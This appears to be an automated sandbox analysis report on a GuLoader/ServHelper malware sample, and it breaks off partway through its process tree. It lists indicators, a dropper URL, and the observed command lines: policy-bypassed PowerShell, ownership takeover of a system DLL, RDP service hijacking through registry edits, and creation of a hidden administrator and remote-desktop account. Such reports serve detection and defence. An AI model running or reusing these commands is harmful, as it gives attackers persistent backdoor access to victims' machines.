guloader | 45abc0ccd7712ead92f531f4bbf98615703448de661a15457ea7dac3c141a63e

Analysis

max time kernel
120s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
01-02-2022 01:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

45abc0ccd7712ead92f531f4bbf98615703448de661a15457ea7dac3c141a63e.exe
Size

4.8MB
MD5

21345fbca5a55ebf159df33e413f49fa
SHA1

a5241a3aeeffca19e3eb645054fd1b35b4aebcfe
SHA256

45abc0ccd7712ead92f531f4bbf98615703448de661a15457ea7dac3c141a63e
SHA512

53b39836db28209b4b3719ceab8997ca7584b51931cd5454bcf454aa45f0457f84b9cc1061f27b81124e126abdf4b1d110d143bab01d0b23556f0fe22cadfd39

Score

10^/10

guloader servhelper backdoor discovery downloader exploit guloader persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Guloader Payload 1 IoCs

guloader

resource	yara_rule
behavioral2/memory/2908-168-0x000001A3A1800000-0x000001A3B99E0000-memory.dmp	family_guloader

Blocklisted process makes network request 10 IoCs

flow	pid	Process
54	1756	powershell.exe
56	1756	powershell.exe
57	1756	powershell.exe
58	1756	powershell.exe
59	1756	powershell.exe
61	1756	powershell.exe
63	1756	powershell.exe
65	1756	powershell.exe
67	1756	powershell.exe
69	1756	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
316	icacls.exe
1720	icacls.exe
3576	icacls.exe
3496	takeown.exe
3728	icacls.exe
3812	icacls.exe
812	icacls.exe
3088	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000400000002171e-189.dat	upx
behavioral2/files/0x000400000002171f-190.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
4044	Process not Found
4044	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3088	icacls.exe
316	icacls.exe
1720	icacls.exe
3576	icacls.exe
3496	takeown.exe
3728	icacls.exe
3812	icacls.exe
812	icacls.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe

Drops file in Windows directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_apkjcpqy.mvt.psm1	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3CB1.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3ADA.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3C90.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3CC1.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pduyo2sh.o2f.ps1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3CE2.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1552	reg.exe

Runs net.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc	stream
HTTP User-Agent header	56	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	57	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	58	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	59	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	61	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
4060	powershell.exe
4060	powershell.exe
2100	powershell.exe
2100	powershell.exe
2908	powershell.exe
2908	powershell.exe
1756	powershell.exe
1756	powershell.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
1756	powershell.exe
1756	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeRestorePrivilege	3812	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2944	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2944	WMIC.exe
Token: SeAuditPrivilege	2944	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2944	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2944	WMIC.exe
Token: SeAuditPrivilege	2944	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3760	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3760	WMIC.exe
Token: SeAuditPrivilege	3760	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3760	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3760	WMIC.exe
Token: SeAuditPrivilege	3760	WMIC.exe
Token: SeDebugPrivilege	1756	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3788 wrote to memory of 4060	3788	45abc0ccd7712ead92f531f4bbf98615703448de661a15457ea7dac3c141a63e.exe	53
PID 3788 wrote to memory of 4060	3788	45abc0ccd7712ead92f531f4bbf98615703448de661a15457ea7dac3c141a63e.exe	53
PID 4060 wrote to memory of 2800	4060	powershell.exe	55
PID 4060 wrote to memory of 2800	4060	powershell.exe	55
PID 2800 wrote to memory of 208	2800	csc.exe	56
PID 2800 wrote to memory of 208	2800	csc.exe	56
PID 4060 wrote to memory of 2100	4060	powershell.exe	57
PID 4060 wrote to memory of 2100	4060	powershell.exe	57
PID 4060 wrote to memory of 2908	4060	powershell.exe	63
PID 4060 wrote to memory of 2908	4060	powershell.exe	63
PID 4060 wrote to memory of 1756	4060	powershell.exe	70
PID 4060 wrote to memory of 1756	4060	powershell.exe	70
PID 4060 wrote to memory of 3496	4060	powershell.exe	74
PID 4060 wrote to memory of 3496	4060	powershell.exe	74
PID 4060 wrote to memory of 3728	4060	powershell.exe	75
PID 4060 wrote to memory of 3728	4060	powershell.exe	75
PID 4060 wrote to memory of 3812	4060	powershell.exe	76
PID 4060 wrote to memory of 3812	4060	powershell.exe	76
PID 4060 wrote to memory of 812	4060	powershell.exe	77
PID 4060 wrote to memory of 812	4060	powershell.exe	77
PID 4060 wrote to memory of 3088	4060	powershell.exe	78
PID 4060 wrote to memory of 3088	4060	powershell.exe	78
PID 4060 wrote to memory of 316	4060	powershell.exe	79
PID 4060 wrote to memory of 316	4060	powershell.exe	79
PID 4060 wrote to memory of 1720	4060	powershell.exe	80
PID 4060 wrote to memory of 1720	4060	powershell.exe	80
PID 4060 wrote to memory of 3576	4060	powershell.exe	81
PID 4060 wrote to memory of 3576	4060	powershell.exe	81
PID 4060 wrote to memory of 1756	4060	powershell.exe	82
PID 4060 wrote to memory of 1756	4060	powershell.exe	82
PID 4060 wrote to memory of 1552	4060	powershell.exe	83
PID 4060 wrote to memory of 1552	4060	powershell.exe	83
PID 4060 wrote to memory of 3492	4060	powershell.exe	84
PID 4060 wrote to memory of 3492	4060	powershell.exe	84
PID 4060 wrote to memory of 1828	4060	powershell.exe	86
PID 4060 wrote to memory of 1828	4060	powershell.exe	86
PID 1828 wrote to memory of 3572	1828	net.exe	87
PID 1828 wrote to memory of 3572	1828	net.exe	87
PID 4060 wrote to memory of 2776	4060	powershell.exe	88
PID 4060 wrote to memory of 2776	4060	powershell.exe	88
PID 2776 wrote to memory of 3008	2776	cmd.exe	91
PID 2776 wrote to memory of 3008	2776	cmd.exe	91
PID 3008 wrote to memory of 3408	3008	cmd.exe	89
PID 3008 wrote to memory of 3408	3008	cmd.exe	89
PID 3408 wrote to memory of 1956	3408	net.exe	90
PID 3408 wrote to memory of 1956	3408	net.exe	90
PID 4060 wrote to memory of 3824	4060	powershell.exe	92
PID 4060 wrote to memory of 3824	4060	powershell.exe	92
PID 3824 wrote to memory of 3364	3824	cmd.exe	93
PID 3824 wrote to memory of 3364	3824	cmd.exe	93
PID 3364 wrote to memory of 3084	3364	cmd.exe	94
PID 3364 wrote to memory of 3084	3364	cmd.exe	94
PID 3084 wrote to memory of 1632	3084	net.exe	95
PID 3084 wrote to memory of 1632	3084	net.exe	95
PID 3600 wrote to memory of 1008	3600	cmd.exe	99
PID 3600 wrote to memory of 1008	3600	cmd.exe	99
PID 1008 wrote to memory of 3304	1008	net.exe	100
PID 1008 wrote to memory of 3304	1008	net.exe	100
PID 1556 wrote to memory of 3812	1556	cmd.exe	103
PID 1556 wrote to memory of 3812	1556	cmd.exe	103
PID 3812 wrote to memory of 812	3812	net.exe	104
PID 3812 wrote to memory of 812	3812	net.exe	104
PID 3088 wrote to memory of 3944	3088	cmd.exe	107
PID 3088 wrote to memory of 3944	3088	cmd.exe	107

C:\Users\Admin\AppData\Local\Temp\45abc0ccd7712ead92f531f4bbf98615703448de661a15457ea7dac3c141a63e.exe
"C:\Users\Admin\AppData\Local\Temp\45abc0ccd7712ead92f531f4bbf98615703448de661a15457ea7dac3c141a63e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4060
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dyfq03zv\dyfq03zv.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF441.tmp" "c:\Users\Admin\AppData\Local\Temp\dyfq03zv\CSCF3F294A4B1143C088BFA9305A7C2E95.TMP"
      4⤵
      PID:208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1756
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3496
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3728
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3812
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:812
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3088
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:316
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1720
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3576
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1756
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:1552
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:3492
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3572
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2776
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3008
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3824
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3364
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3084
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1632
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2012
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
1⤵
PID:1932

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 939e63fd180013c5e1206812a9b8e19b wPkKkQ52aUC9vH3IlqJcRg.0.1.0.0.0
1⤵
- Modifies data under HKEY_USERS
PID:2128

C:\Windows\system32\net.exe
net start rdpdr
1⤵
- Suspicious use of WriteProcessMemory
PID:3408
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 start rdpdr
  2⤵
  PID:1956

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3600
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:3304

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc CHC0ye2u /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1556
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc CHC0ye2u /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc CHC0ye2u /add
    3⤵
    PID:812

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3088
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:3944
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:888

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD
1⤵
PID:1880
- C:\Windows\system32\net.exe
